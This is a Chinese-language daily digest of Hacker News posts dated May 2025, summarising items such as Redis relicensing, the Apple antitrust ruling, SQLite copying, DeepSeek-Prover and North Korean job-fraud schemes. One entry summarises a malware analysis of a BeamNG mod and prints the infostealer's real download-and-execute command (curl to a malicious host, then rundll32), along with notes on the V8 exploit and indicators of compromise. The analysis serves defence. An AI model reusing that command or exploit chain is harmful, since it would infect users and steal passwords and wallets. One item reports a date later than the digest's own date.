2025-05-01

48 篇热帖

1. Redis is open source again (antirez.com)

Redis 重新采用开源许可证 (AGPLv3)

Redis 创始人 antirez 在重返公司五个月后,积极推动将 Redis 的许可证从 SSPL 切换回开源许可证。他发现公司内部早已有改用 AGPL 许可证的讨论。他认为 SSPL 在实践中未能获得开源社区和 OSI(开放源代码倡议组织)的认可,因此不是真正的开源许可证。这一观点逐渐在公司内部获得了支持。

antirez 个人强烈希望将新开发的“向量集”(Vector Sets)数据类型以开源许可证发布,因为编写开源软件是他职业生涯的核心。Redis 重返开源,也让他能更有热情地投入开发。

此次许可证变更是为了使 Redis 项目与开源社区的努力保持一致,获得更广泛的用户接受度,并参与超越单个公司的人类集体智慧项目。新版许可证为 AGPLv3

与许可证变更同步,Redis 8 已正式发布,带来了众多新功能与核心性能优化。

2. Judge rules Apple executive lied under oath, makes criminal contempt referral (www.thebignewsletter.com)

苹果反垄断案裁决与FTC权力提案撤回

一、苹果被制裁及高管涉刑事藐视法庭

  • 案件背景:Epic Games于2020年对苹果提起反垄断诉讼。2021年,法官Yvonne Gonzalez Rogers裁定苹果在应用商店控制方面存在不公平行为,禁止苹果阻止开发者与用户沟通或在应用商店外提供支付选项。该裁决经第九巡回上诉法院维持,最高法院于2024年1月拒绝受理上诉。
  • 苹果违规:苹果在裁决生效后采取不正当手段规避合规,包括引入新收费、设置警告屏幕及作伪证。
  • 法官裁决
    • 法官认定苹果副总裁Alex Roman在宣誓下说谎,将其移交美国检察官进行刑事藐视法庭调查。
    • 法官直接批评苹果CEO蒂姆·库克忽视内部合规建议,选择反竞争策略。
    • 命令苹果立即允许开发者在不收取任何佣金的情况下,在应用商店外销售应用。
  • 影响:此裁决可能彻底改变应用经济,若第九巡回法院不暂停执行,开发者将立即获得新的销售渠道。

二、共和党撤回削弱FTC反垄断权力的提案

  • 提案内容:共和党领袖Jim Jordan提出将FTC竞争部门合并至司法部反垄断部门,但未转移FTC独有的“不公平竞争方法”监管权,此举实质是废除该权力,影响针对亚马逊、UnitedHealth集团等公司的反垄断诉讼。
  • 反对声音
    • 前反垄断执法者、民主党议员(如Becca Balint和Pramila Jayapal)及民粹主义右翼人物(如史蒂夫·班农)公开批评。
    • 小企业团体(如全国杂货商协会)表示担忧,认为提案会削弱对垄断行为的制约。
  • 结果:在委员会修订中,Jordan撤回了涉及FTC的条款,保留了该机构的现有权力。

关键细节

  • 苹果称将遵守裁决但会上诉,FTC权力提案因跨党派反对而失败。
  • 两件事均显示反垄断执法的持续推进,可能对科技巨头和市场竞争产生长期影响。
4. A faster way to copy SQLite databases between computers (alexwlchan.net)

摘要:更快复制SQLite数据库的方法

问题背景

作者在远程服务器上存储大量SQLite数据库,需要频繁复制到本地进行分析或备份。直接使用rsync命令复制数据库文件,随着数据库增长(如达到数GB),传输速度变慢且不可靠,尤其是数据库中的索引虽然加速查询,但显著增加文件大小(例如,一个索引可能占数据库一半空间),导致复制效率低下。

解决方案

利用SQLite内置的.dump命令将数据库转储为文本文件。该文本文件包含重建数据库所需的SQL语句,将索引简化为创建指令而非完整数据,从而大幅减小文件大小。例如,原始数据库3.4GB转储后文本文件为1.3GB,进一步使用gzip压缩后仅为240MB,压缩比达14倍。

具体步骤

  1. 在服务器上创建压缩文本文件
    ssh username@server "sqlite3 my_remote_database.db .dump | gzip -c > my_remote_database.db.txt.gz"
    
  2. 复制压缩文件到本地
    rsync --progress username@server:my_remote_database.db.txt.gz my_local_database.db.txt.gz
    
  3. 清理服务器临时文件
    ssh username@server "rm my_remote_database.db.txt.gz"
    
  4. 本地解压并重建数据库
    gunzip my_local_database.db.txt.gz
    cat my_local_database.db.txt | sqlite3 my_local_database.db
    rm my_local_database.db.txt
    

优点

  • 传输效率提升:压缩文本文件显著减小体积,加速下载。
  • 可靠性增强:文本转储是稳定副本,避免复制过程中数据库更新导致的文件损坏(如rsync中途复制可能产生混合版本,造成“database disk image is malformed”错误)。
  • 操作简单:利用SQLite原生工具,无需额外软件,流程清晰。

总结

该方法通过转储、压缩和重建流程,解决了大SQLite数据库复制慢和不可靠的问题,适用于远程备份和分析场景。

6. We identified a North Korean hacker who tried to get a job (blog.kraken.com)

摘要

Kraken安全团队近期发现并挫败了一起由朝鲜黑客策划、试图通过求职过程渗透公司的行动。该事件体现了国家级黑客攻击的新趋势,即通过社会工程学手段而非技术漏洞进行入侵。

事件经过:

  1. 初步发现:候选人在初次电话面试中出现姓名不一致、实时被指导等可疑行为。同时,公司收到来自行业伙伴的威胁情报,其中一个恶意邮箱地址与该候选人匹配。
  2. 深入调查:安全团队通过开源情报(OSINT)方法展开调查,发现:
    • 该候选人关联的邮箱属于一个庞大的虚假身份网络,该网络在加密货币及其他行业有多次求职记录。
    • 技术层面存在多处异常:使用远程托管设备与VPN隐藏真实位置、GitHub资料中的邮箱曾遭数据泄露、主要身份证明文件疑似被盗用并篡改。
  3. 主动反制:为深入研究攻击者手法,团队未打草惊蛇,而是让候选人继续参与多轮面试(包括技术测试与最终由首席安全官主持的“化学面试”)。
  4. 陷阱与暴露:在最终面试中,团队穿插了实时身份验证问题,如要求展示证件、描述声称所在地的细节等。候选人无法通过这些即时测试,暴露了其冒用身份的事实。

主要发现与启示:

  • 攻击面扩大:攻击者正尝试通过正规招聘流程潜入企业,安全防御需覆盖整个组织运营。
  • 技术侦查手段:利用数据泄露信息、分析数字痕迹和设备配置是识别此类身份欺诈的有效方法。
  • 验证策略:结合预设问题与动态、无法预料的实时验证问题,能更有效地甄别伪装者。
  • 安全文化:“不信任,需验证”的原则至关重要,安全责任需成为整个组织的共同意识。

Kraken表示,公布此事旨在帮助加密货币及其他行业的企业提升对此类社会工程学攻击的防御能力。

7. Office is too slow, so Microsoft is making it load at Windows startup (www.pcworld.com)

微软将通过"启动加速"功能提升Office启动速度

微软宣布将为其Office套件推出一项名为 "启动加速" 的新功能,旨在缩短Word、Excel等应用程序的启动时间。该功能通过在Windows系统启动时预先加载Office组件来实现加速,但这也意味着可能会增加系统启动时的资源占用。

核心要点

  1. 功能原理:该功能会在Windows启动时,利用空闲资源在后台预先加载Office组件,从而使后续用户打开Word、Excel等应用时能更快启动。
  2. 硬件要求:为确保系统稳定,此功能仅在满足最低配置的电脑上启用:内存不低于8GB可用磁盘空间不低于5GB
  3. 推出计划:该更新将首先于五月中旬应用于Microsoft Word,随后逐步推广至其他Office应用程序。它将通过微软365安装程序的更新进行部署。
  4. 用户控制:此功能并非强制启用。用户可以选择关闭它,关闭途径包括:在Word的设置中,或通过系统的任务计划程序。
  5. 观点与质疑:文章作者对此功能持批判态度,认为这并非从根本上优化Office效率,而只是将启动加载过程提前,可能会拖慢计算机的整体启动速度。文章暗示,微软更应该致力于提升Office软件本身的运行效率。

背景与来源

此消息源于微软365消息中心档案的一则公告,最初由科技媒体The Verge报道。

8. 108B Pixel Scan of Johannes Vermeer's Girl with a Pearl Earring (www.hirox-europe.com)

这是一篇关于约翰内斯·维米尔(Johannes Vermeer)画作《戴珍珠耳环的少女》的高分辨率扫描介绍。扫描分辨率达到108吉像素(约1080亿像素),旨在为用户提供极高的细节探索能力。内容强调了该扫描的超高分辨率特性,并附有用于社交分享的图像链接,以便进一步查看。整体专注于展示画作的精细结构和数字保存技术。

10. DeepSeek-Prover-V2 (github.com)

DeepSeek-Prover-V2 总结

DeepSeek-Prover-V2 是一个专为在 Lean 4 中进行形式化定理证明而设计的开源大语言模型。它通过强化学习子目标分解来提升形式化数学推理能力。

核心创新与训练流程

  1. 递归定理证明与冷启动数据合成

    • 利用 DeepSeek-V3 作为核心工具,通过递归流程构建冷启动数据集。
    • 提示 DeepSeek-V3 将复杂定理分解为高级证明骨架并同时形式化为 Lean 4 子目标。
    • 使用一个较小的 7B 模型处理每个子目标的证明搜索,以降低计算开销。
    • 将已解决子目标的完整形式化证明与 DeepSeek-V3 的逐步推理链结合,生成初始的冷启动推理数据。
  2. 基于合成数据的强化学习

    • 筛选出对 7B 模型具有挑战性(但所有子目标均已解决)的问题,构建完整的合成证明。
    • 将形式化证明附加到 DeepSeek-V3 的推理链之后,形成非形式化推理与形式化证明的融合数据。
    • 在冷启动数据微调后,采用强化学习阶段,使用二元正误反馈作为奖励信号,进一步优化模型在非形式化推理与形式化证明构建之间的桥梁能力。

模型性能与版本

  • 最终模型 DeepSeek-Prover-V2-671B 在神经定理证明中达到了最先进的性能
    • MiniF2F-test 上通过率为 88.9%
    • PutnamBench 的658个问题中解决了49个。
  • 发布了两个版本:
    • DeepSeek-Prover-V2-671B:基于 DeepSeek-V3-Base 构建。
    • DeepSeek-Prover-V2-7B:基于 DeepSeek-Prover-V1.5-Base 构建,支持最长 32K tokens 的上下文长度。

新基准测试:ProverBench

  • 推出了 ProverBench 评测基准,包含 325 个形式化问题。
  • 问题来源包括:
    • 近年 AIME(美国数学邀请赛)竞赛题(15题)。
    • 精心筛选的教材例题和教程(310题),涵盖数论、代数、微积分、分析等多个领域。
  • 旨在对高中竞赛和本科数学水平进行更全面的评估。

获取与使用

  • 模型和数据集(包括 ProverBench 和 MiniF2F 的证明)均可在 Hugging Face 上下载。
  • 提供了基于 transformers 库的快速推理代码示例,展示了如何为一个形式化陈述生成证明计划和 Lean 4 代码。

许可证与联系

  • 模型使用需遵循其发布的模型许可证
  • 如有疑问可通过 GitHub Issues 或联系邮箱 service@deepseek.com
11. Google Play sees 47% decline in apps since start of last year (techcrunch.com)

Google Play's app marketplace is losing apps. From the start of 2024 to the present, the Android app marketplace went from hosting about 3.4 million apps

12. How the US defense secretary circumvents official DoD communications equipment (www.electrospaces.net)

美国国防部长皮特·赫格塞斯在五角大楼办公室内配备了一套复杂的官方通讯设备,这些设备多年来基本保持不变。其中包括用于最高机密危机管理系统(CMS)的黄色边框思科IP电话、属于国防红色交换网络(DRSN)的综合业务电话-2(IST-2)、用于非机密通话的绿色边框思科IP电话,以及连接非机密网络(NIPRNet)的计算机屏幕和可通过KVM切换至机密(SIPRNet)及最高机密(JWICS)网络的系统。此外,还有用于视频会议的思科Webex DX80屏幕,其中一台标有黄色标签,用于最高机密通讯。

尽管拥有这些官方安全的通讯渠道,赫格塞斯却坚持使用端对端加密的Signal应用。由于无法在政府设备上安装Signal,他最初在办公室后部使用个人设备通过Wi-Fi连接该应用。随后,他要求在其办公桌安装一条直连公共互联网的线路,并放置了一台私人电脑,该电脑后来被安装了Signal应用,从而将其个人手机上的Signal“克隆”到了该电脑上。此举旨在绕过五角大楼内部分区域手机信号不佳的问题,便于与使用Signal的白宫及其他特朗普政府官员沟通。然而,这条线路绕过了五角大楼的安全协议,且监控不如NIPRNet严密。到2025年5月5日,这台未经授权的电脑已从其办公桌上移走。

赫格塞斯的上述举动尤为引人关注,因为作为国防部长,他有权使用名为“部长电缆”(SecDef Cables)的专业通信中心。该中心是国防部长通信(SDC)单位的一部分,由26名军人和4名文职人员组成,能够为其提供跨平台、跨密级的全面语音、视频和数据通信能力,并负责联络国家军事指挥中心、白宫战情室、国务院作战中心等机构。

13. Running Qwen3 on your macbook, using MLX, to vibe code for free (localforge.dev)

本文介绍了在MacBook上使用MLX框架本地运行Qwen3模型,并通过Localforge工具进行免费“vibe编码”的完整步骤。

主要流程包括:

  1. 环境准备:通过pip install mlxpip install mlx-lm安装MLX核心库及LLM辅助库。
  2. 启动模型服务:使用mlx_lm.server命令启动Qwen3模型服务(示例中使用的是mlx-community/Qwen3-30B-A3B-8bit模型),服务将监听本地端口(如8082)。
  3. 配置Localforge
    • 添加两个模型提供商:一个指向本地运行的Ollama服务(用于轻量级辅助交互),另一个指向MLX启动的Qwen3服务(类型设置为OpenAI,API地址为http://127.0.0.1:8082/v1/)。
    • 创建一个自定义Agent,将其主模型设置为Qwen3提供商及对应模型,辅助模型设置为Ollama提供商。
  4. 使用验证:配置完成后,通过Localforge选择该自定义Agent,即可让Qwen3模型调用工具执行任务,例如列出文件、创建网站甚至生成自玩游戏的代码。

该方法允许用户在本地Mac设备上免费运行强大的Qwen3模型,并利用Localforge框架实现自主代码生成,具有实际应用潜力。

15. An interview question that will protect you from North Korean fake workers (www.theregister.com)

朝鲜虚假工人渗透企业招聘的威胁与对策

近期,朝鲜特工通过伪造身份在全球范围内(尤其是财富500强企业)大规模渗透,担任远程IT职位,旨在窃取知识产权并植入恶意软件。他们采用多种手段规避检测,包括使用VPN伪装地理位置、在美国设立“笔记本农场”模拟本地连接、利用AI批量生成LinkedIn档案和求职申请。

渗透手段与运作模式

  • 身份伪装:使用生成式AI创建虚假身份,甚至盗用或骗取他人身份信息(如以“对抗中国”为由诱骗乌克兰人提供身份)。
  • 面试作弊:面试过程中由多人团队协作完成技术测试,“前台人员”负责应对真人面试,但常出现细节不匹配(如姓名与族裔不符)。
  • 入职后操作:一旦受雇,常表现为“高绩效员工”以获取信任和更高系统权限。工作时,他们会将窃取的知识产权分割成小块,以避免触发安全警报。

检测与应对策略

  • 关键面试问题:提问涉及朝鲜领导人的敏感问题(例如“金正恩有多胖?”),渗透者通常会立即挂断,以避免负面言论。
  • 强化面试流程:要求候选人在公司环境中进行编码测试,以便监控其屏幕切换行为和代码来源。
  • 本地核实:尽可能安排线下面对面会面,或避免招聘完全远程的员工。
  • 内部教育与警惕:对所有参与招聘流程的人员进行培训,识别可疑迹象。
  • 立即举报:一旦发现疑似虚假员工,应立即联系当地FBI办事处。被解雇的渗透者通常已窃取凭证或植入休眠恶意软件,并可能进行勒索。

威胁的演变与挑战 朝鲜工人不断调整战术以规避防御措施:

  • 笔记本农场:在美国境内设立据点,远程操控公司设备,运营商可能面临多项刑事指控。
  • 深度伪造技术:利用不断改进的深度伪造进行视频面试,已足以欺骗专业人士。
  • 情报反制:朝鲜方面会研究并适应各国执法机构发布的防御指南。

深层影响 通过此方式赚取的资金被汇回朝鲜,间接支持了参与俄乌冲突的朝鲜军队,形成了复杂的地缘政治资金链。

综上,企业需保持高度警惕,结合技术审查与人工面试策略,并认识到这是一个不断升级的“猫鼠游戏”。

16. NotebookLM Audio Overviews are now available in over 50 languages (blog.google)

NotebookLM音频概述现已支持超过50种语言

更新日期:2025年4月29日 作者:Michael Chen(软件工程师,Google Labs)与Arielle Fox(项目经理,Google Labs)

NotebookLM的音频概述功能现已实现多语言支持,覆盖50余种语言。该功能基于Gemini的原生音频能力,能够将用户上传的资料转换成类似播客的互动式对话摘要,帮助使用者以自己偏好的语言理解信息。

核心要点

  • 多语言支持:音频概述现已支持超过50种语言,包括南非语、印地语、土耳其语等。
  • 功能形式:将用户提供的源资料(如文档、笔记)转化为连贯的音频摘要,呈现为播客风格的对话。
  • 技术基础:由Gemini模型的原生音频处理能力驱动。
  • 用户设置:新增“输出语言”选项,用户可在设置中选择音频摘要的目标语言,并可随时更改。
  • 应用场景:有助于打破语言障碍,促进学习与信息获取的包容性。

功能使用方式

用户可在NotebookLM账户中设定首选语言。音频概述生成时,将基于所选“输出语言”设置自动使用对应语言。更换语言后,生成的音频和聊天回应均会更新,方便用户创建多语言内容或学习材料。

实际应用示例

例如,教师在准备关于亚马逊雨林的课程时,可上传来自不同语言的资源(如葡萄牙语纪录片、西班牙语研究论文、英文学习报告)。学生上传这些资料后,可生成自己母语的音频概述,获取关键信息。这有助于跨越语言门槛,使知识更易于理解。

试用与展望

用户可前往notebooklm.google体验该功能。目前为早期版本,团队计划根据用户反馈持续优化。此更新旨在帮助更多人以熟悉的语言探索信息、获得见解。

(注:文章图片展示了NotebookLM标志周围环绕声波及多种语言选项的界面,象征其多语言音频能力。)

17. Linkwarden: FOSS self-hostable bookmarking with AI-tagging and page archival (linkwarden.app)

Linkwarden 是一款功能全面的开源书签管理工具,支持自托管,旨在提供完整的网页保存、组织与检索解决方案。

核心功能与特点:

  • 开源与自托管: 项目源代码完全公开于 GitHub,保障透明度与信任,用户可自行部署。
  • 隐私优先: 明确承诺不向第三方出售用户数据。
  • 多平台客户端: 提供官方 iOS 和 Android 移动应用,并支持渐进式 Web 应用(PWA),提供跨设备的类原生应用体验。
  • 强大的信息保存与管理:
    • 网页存档与阅读: 可保存网页并支持在无干扰环境中查看和高亮文章。
    • AI 标签: 具备 AI 驱动的标签功能,简化内容分类。
    • RSS 订阅: 可在集合内直接关注 RSS 源,新文章会像普通保存的网页一样显示。
    • 批量操作: 支持同时编辑或删除多个项目。
    • 数据导入导出: 可方便地从设置中导入和导出书签。
  • 灵活的组织与访问:
    • 固定与自定义: 可将重要链接和集合固定在仪表板上以快速访问。
    • 高级搜索: 提供强大的搜索与过滤功能,支持使用高级搜索操作符跨所有集合检索内容。
  • 无缝集成与同步:
    • 浏览器扩展: 配备开源浏览器扩展,可直接收集网页。
    • 浏览器同步: 可通过 Floccus 同步浏览器书签。
    • 安全 API: 通过访问令牌支持安全的 API 集成,便于创建自定义解决方案和自动化。
  • 持续发展: 项目通过博客持续发布新功能与改进的更新日志。
19. Espressif's ESP32-C5 Is Now in Mass Production (www.espressif.com)

乐鑫ESP32-C5已进入量产阶段

乐鑫科技(SSE: 688018.SH)宣布,业界首款支持双频Wi-Fi 6(2.4 GHz 和 5 GHz)、蓝牙5 (LE) 及IEEE 802.15.4(Zigbee, Thread)协议的RISC-V SoC——ESP32-C5已正式量产。

该芯片专为需要高效、低延迟无线传输的应用设计。其搭载的32位单核处理器主频高达240 MHz,内置384 KB SRAM并支持外挂PSRAM,具有320 KB ROM。ESP32-C5提供多达29个可编程GPIO,支持SDIO、QSPI等高速外设接口,并集成一流的安全功能。此外,它还包含一个最高运行频率为40 MHz的LP-CPU,适用于对功耗敏感的应用场景。

软件方面,ESP32-C5受益于乐鑫成熟的物联网开发框架ESP-IDF。即将发布的ESP-IDF v5.5将包含对ESP32-C5的初步支持。该芯片还可通过ESP-ATESP-Hosted方案作为外部主机的通信协处理器。

ESP32-C5开发板现已在乐馨官方商店发售。如需了解更多产品信息,可访问乐鑫官网或联系其客户支持团队。

20. Mercury, the first commercial-scale diffusion language model (www.inceptionlabs.ai)

Mercury:首个商用规模的扩散语言模型

核心突破

Mercury系列是新一代扩散大型语言模型(dLLMs),旨在实现快速、高质量的文本生成。其核心优势在于:

  • 速度提升:在NVIDIA H100上实现超过1000 tokens/sec的推理速度,比当前速度优化的前沿LLM快5-10倍,此前仅定制芯片能达到此速度。
  • 范式变革:采用“从粗到精”的扩散生成机制,而非传统的自回归(逐token)方式,提升了推理、纠错能力并减少幻觉。

模型发布:Mercury Coder

首个公开可用的dLLM,专为代码生成优化。

  • 性能表现:在HumanEval、MBPP等多项基准测试中,质量常超越GPT-4o Mini和Claude 3.5 Haiku等速度优化模型,同时速度快达10倍。
  • 速度对比:在代码任务中,吞吐量超1000 tokens/sec(Mercury Coder Mini),而前沿模型通常低于200 tokens/sec。
  • 开发者偏好:在Copilot Arena基准中,Mercury Coder Mini排名并列第二,超越多个大型和速度优化模型。

技术原理与应用

  • 工作原理:基于Transformer的扩散模型,通过并行修改多个token来逐步精炼输出,而非顺序生成。
  • 即插即用:可作为传统自回归LLM的直接替代,支持RAG、工具使用和智能体工作流。
  • 应用场景:已用于客户支持、代码生成和企业自动化等领域,允许合作伙伴使用更大模型同时满足低延迟要求。
  • 访问方式:提供API和本地部署,兼容现有硬件、数据集及微调流程。

未来展望

Mercury Coder是系列dLLM的首款模型,聊天应用模型已进入内测。扩散语言模型将解锁:

  1. 智能体优化:速度与效率适合需要大量规划和生成的智能体应用。
  2. 高级推理:在秒级时间内通过纠错改进答案,克服当前推理模型的延迟问题。
  3. 可控生成:支持文本填充、对齐安全目标或遵循指定格式。
  4. 边缘应用:高效性使其适用于手机、笔记本电脑等资源受限环境。

资源

  • 技术报告:可查阅详细技术文档。
  • 测试平台:通过与Lambda Labs合作的在线体验平台测试Mercury Coder。
21. RFK Jr. rejects cornerstone of health science: Germ theory (arstechnica.com)

In his 2021 book vilifying Anthony Fauci, RFK Jr. lays out support for an alternate theory.

22. Future of OSU Open Source Lab in Jeopardy (osuosl.org)

A nonprofit organization working for the advancement of open source technologies.

24. When ChatGPT broke the field of NLP: An oral history (www.quantamagazine.org)

ChatGPT 如何重塑自然语言处理领域:一场口述史

前言:大洪水之前

  • Transformer架构的诞生:2017年谷歌论文《Attention Is All You Need》引入Transformer架构,但当时许多研究者持怀疑态度,认为其缺乏语言学洞察,只是“临时技巧”。
  • BERT的爆发:2018年谷歌开源模型BERT迅速打破多项性能记录,引发“BERTology”热潮。研究者们开始围绕大规模基准测试竞赛,但部分人认为这变成了“规模化游戏”。

第一阶段:玫瑰战争(2020-2022)

  • 关于“理解”的争论:2020年,Emily Bender等人发表“章鱼测试”论文,主张仅通过统计模式模仿语言形式的模型无法真正理解意义,引发领域内激烈辩论。
  • GPT-3的震撼:2020年OpenAI发布GPT-3,其能力和规模让许多研究者感到“存在主义危机”。它展示了通过自然语言指令即可完成新任务的惊人能力,但也引发了关于学术研究是否沦为“API科学”的争议。
  • 分裂加剧:2021年“随机鹦鹉”论文进一步引发关于模型规模、伦理和语言本质的“内战”。2022年的领域调查显示了社区内部的深刻分歧,NLP领域似乎陷入“危机”。

第二阶段:希克苏鲁伯撞击(2022年11月-2023年)

  • ChatGPT的冲击:2022年11月ChatGPT发布,如同小行星撞击。它使大量传统NLP研究问题瞬间过时,引发行业地震和学术界的身份危机。
  • 研究者的反应:许多博士生面临研究方向被颠覆的困境,领域会议充满困惑:“这会是最后一届NLP会议吗?” 同时,媒体和公众的爆炸性关注给研究者带来前所未有的压力。
  • 范式转变:NLP领域迅速从相对小众的学术圈转变为全球关注的焦点,研究重心和评价体系发生根本变化。

第三阶段:物竞天择(2024-2025)

  • 成为“LLM学家”:研究焦点从理解语言本身全面转向理解和改进大语言模型。部分研究者认为这偏离了科学本质,但另一些人认为这是必经之路。
  • 边界模糊:NLP与AI的界限彻底模糊。资本涌入、行业影响力剧增,改变了研究的激励机制。一些研究者转向创业,另一些人则坚持在理论前沿探索。
  • 开放与封闭:面对工业界封闭模型的主导,开源社区(如Ai2的OLMo)努力提供替代方案。同时,对LLM能力极限和缺陷的严格研究也变得重要且充满争议。

结语:大语言模型是范式转移吗?

  • 肯定观点:研究者认为,从需要精心设计任务到“一个界面解决所有问题”的转变是前所未有的范式转移。实证检验古老哲学问题、巨大的资本和媒体关注也彻底改变了游戏规则。
  • 怀疑观点:也有观点认为核心原理(如迁移学习)并未改变,只是规模扩大。有人担心这可能是一条“死胡同”,或只是取代了旧问题,创造了新问题。
  • 未来不确定:所有人都承认领域处于剧变中,影响深远,但最终历史评价尚需时间。正如一位研究者所说:“也许在2030年,我们会认为2029年发生的事让现在显得微不足道。”
25. Vanguard 50-year anniversary CEO letter (corporate.vanguard.com)

Our CEO reflects on Vanguard’s first 50 years and outlines how we will continue to take a stand for investors.

28. JetBrains defends removal of negative reviews for unpopular AI Assistant (devclass.com)

JetBrains has defended its removal of negative reviews and feedback for its AI Assistant on its plugin marketplace, […]

29. Wyze pays $255k of tariffs on $167k of floodlights (twitter.com)

摘要:

Wyze 公司为一批价值 167,000 美元的泛光灯货物,支付了高达 255,000 美元的关税。这意味着其支付的关税金额显著超过了货物本身的价值,造成了严重的成本倒挂。

31. Strings Just Got Faster (inside.java)

In JDK 25, Strings used as keys in immutable Maps can be much faster.

32. Owen Le Blanc: creator of the first Linux distribution (lwn.net)

Ask a Linux enthusiast who created the Linux kernel, and odds are they will have no trouble nam [...]

33. I Found Malware in a BeamNG Mod (lemonyte.com)

BeamNG.drive模组恶意软件分析

事件概述

作者在运行BeamNG.drive游戏时,杀毒软件检测到curl.exe试图访问恶意域名。经调查确认恶意代码来源于名为“American Road”的模组。

攻击链分析

1. 投递器第一阶段

  • 文件american_road_patreon_banner.js
  • 伪装:表面为Patreon赞助横幅展示脚本
  • 关键代码
    • 使用XMLHttpRequest加载banner.c_css文件
    • 通过XOR运算(密钥"css")解码文件内容
    • 使用[].constructor.constructor(styles)()动态执行解码后的代码(等效于eval
  • 触发机制:Lua脚本在模组加载后调用reloadUI()确保恶意代码执行

2. 投递器第二阶段

  • 漏洞利用:CVE-2019-5825(Chromium V8引擎6年前的漏洞)
  • 技术细节
    • 创建WebAssembly实例获取函数地址
    • 通过内存读写原语(addrof/rq/wq/cpy)实现越界内存访问
    • 将shellcode写入可执行内存地址
    • 利用setTimeout延迟执行被修改的WASM函数

3. Shellcode负载

  • 主要功能:执行cmd命令,下载并执行恶意DLL
  • 命令内容
    cmd /c curl -s --fail https://ac7b2eda6f14.datahog.su/2w3e98t5zh298w3tzhg7982w3t4eg -o "%TEMP%\tmp6FC15.tmp" && move "%TEMP%\tmp6FC15.tmp" "%TEMP%\tmp6FC15.dll" && rundll32 "%TEMP%\tmp6FC15.dll",main
    

4. 最终恶意软件

  • 类型:信息窃取恶意软件(Infostealer)
  • 窃取目标
    • 浏览器保存的密码
    • Exodus加密钱包应用数据

影响范围

  • 受影响模组:“American Road”(4月1日被植入恶意代码)
  • 下载量:超过3,500次下载
  • 游戏版本:BeamNG.drive v0.34使用存在漏洞的CEF版本
  • 更新情况:v0.35(4月2日)已更新CEF至安全版本

指标(IoC)

文件路径

  • %TEMP%\tmp6FC15.tmp
  • %TEMP%\tmp6FC15.dll
  • %TEMP%\TMP785E.tmp

哈希值

  • tmp6FC15.dll SHA-256: 9ec86514d5993782d455a4c9717ec4f06d0dfcd556e8de6cf0f8346b8b8629d4
  • TMP785E.tmp SHA-256: 75c0aa897075a7bfa64d8a55be636a6984e2d1a5a05a54f0f01b0eb4653e9c7a

恶意域名

  • ac7b2eda6f14.datahog.su
  • datacrab-analytics.com

应对措施

  1. 立即删除“American Road”模组
  2. 全盘扫描恶意软件
  3. 更改所有可能泄露的密码
  4. 升级BeamNG.drive至v0.35或更高版本

技术要点

  • 攻击利用了CEF中的Chromium漏洞(已修复)
  • BeamNG.drive使用--no-sandbox参数降低了安全防护
  • 恶意代码经过多层混淆和动态执行
  • 杀毒软件对最终DLL的检测率较高,但存在约一周的检测延迟
34. RustAssistant: Using LLMs to Fix Compilation Errors in Rust Code (www.microsoft.com)

RustAssistant 技术报告总结

本报告介绍了微软研究院的两个项目,旨在利用大语言模型解决底层安全编程中的挑战。第一个项目专注于为遗留 C 代码推断可机器检查的内存安全不变量,第二个项目介绍了 RustAssistant 工具,该工具可自动修复 Rust 代码库中的编译错误。

项目一:利用 LLM 提升 C 代码的内存安全

  • 背景与挑战:C/C++ 缺乏内存安全是主要安全漏洞来源(微软估计70%的 CVE 源于此)。虽然存在如 Checked C 这样的安全方言,可通过源码注解来保证安全,但手动添加注解和重构代码的成本过高,阻碍了其应用。
  • 方法与创新:研究探索使用预训练的大语言模型来自动推断所需的源码注解并辅助代码重构。LLM 强大的代码理解和推理能力使其适合此任务。一个关键优势是,即使 LLM 生成了错误的注解,Checked C 编译器也能保证内存安全,从而结合了 LLM 的灵活性和形式化方法的安全性。
  • 技术框架:为处理大型代码库的整体程序变换,该研究提出了一个框架,利用程序依赖图将任务分解为适合 LLM 提示的子任务,并为每个提示添加相关的符号上下文,模拟程序员的思考过程。该框架被实现在名为 MSA 的工具中。
  • 结果:在真实的、最多达2万行代码的代码库上评估,MSA 能够推断出当前最先进符号化工具无法推断的86%的注解。

项目二:RustAssistant — 自动修复 Rust 编译错误

  • 背景与挑战:Rust 通过所有权系统在编译时保证内存和并发安全,但其陡峭的学习曲线,尤其是与所有权、生命周期、特征相关的编译错误,给开发者带来了困难。
  • 工具与方法:RustAssistant 是一个利用 LLM 自动建议修复 Rust 编译错误的工具。其工作流程分为三步:
    1. 构建与解析:运行 Rust 编译器,捕获详细的错误信息(包括错误码、位置和相关文档)。
    2. 上下文提取:自动从大型代码库中精确定位并提取与错误直接相关的代码片段(包括问题行及必要上下文),连同错误详情一起封装成高效的提示。
    3. 迭代修复:将提示发送给 LLM,生成格式为代码差异的修复建议。RustAssistant 将其应用到代码库,并再次运行编译器进行验证。如果出现新错误或问题未完全解决,则会将更新后的上下文返回给 LLM 进行迭代,直至编译通过。
  • 结果:在 GitHub 上排名前100的 Rust 开源项目中进行评估,RustAssistant 在真实世界的编译错误上达到了约74%的峰值准确率。

总结

两个项目共同展示了 LLM 在代码理解与生成方面的强大能力如何被用于提升底层系统软件的安全性与开发效率。MSA 的方法更为通用,可扩展至形式化验证领域以保证可靠性;而 RustAssistant 则专注于改善 Rust 的开发体验。两者均通过精心设计的提示工程和上下文管理,在真实大型代码库中取得了显著成效。

35. Trust Me, I'm Local: Chrome Extensions, MCP, and the Sandbox Escape (blog.extensiontotal.com)

Trust Me, I’m Local reveals how Chrome extensions and MCP abuses enabled sandbox escapes, exposing users to major security vulnerabilities.

36. LLMs for Engineering: Teaching Models to Design High Powered Rockets (arxiv.org)

Abstract page for arXiv paper 2504.19394: LLMs for Engineering: Teaching Models to Design High Powered Rockets

37. Home washing machines fail to remove important pathogens from textiles (medicalxpress.com)

Health care workers who wash their uniforms at home may be unknowingly contributing to the spread of antibiotic-resistant infections in hospitals, according to a new study led by Katie Laird of De Montfort University, published in PLOS One.

38. Reversible computing with mechanical links and pivots (tennysontbardwell.com)

可逆计算与机械链接和枢轴

随着“摩尔定律已死”的担忧,非常规计算形式受到关注,其中包括可逆计算,旨在实现最高能效。基于兰道尔原理,非物理可逆操作在室温下至少消耗 (2.9 \times 10^{-21}) J 能量。当前处理器(如AMD Ryzen Threadripper 7995WX)的能效仍比理论极限低约9个数量级,表明还有很大改进空间。因此,探索如机械链接和枢轴这样的可逆计算范式具有意义。

核心组件与结构

该方案使用链接旋转关节构建图灵完备的计算系统,主要组件如下:

  • 锁(Lock):基本元素,由两个可滑动的三角形组成。一个三角形向前推会阻止另一个前进,实现互锁。演示中使用弹簧和枢轴点,可拖动滑块交互。理论上可在纳米尺度(如30×30×7 nm)用碳材料制造。

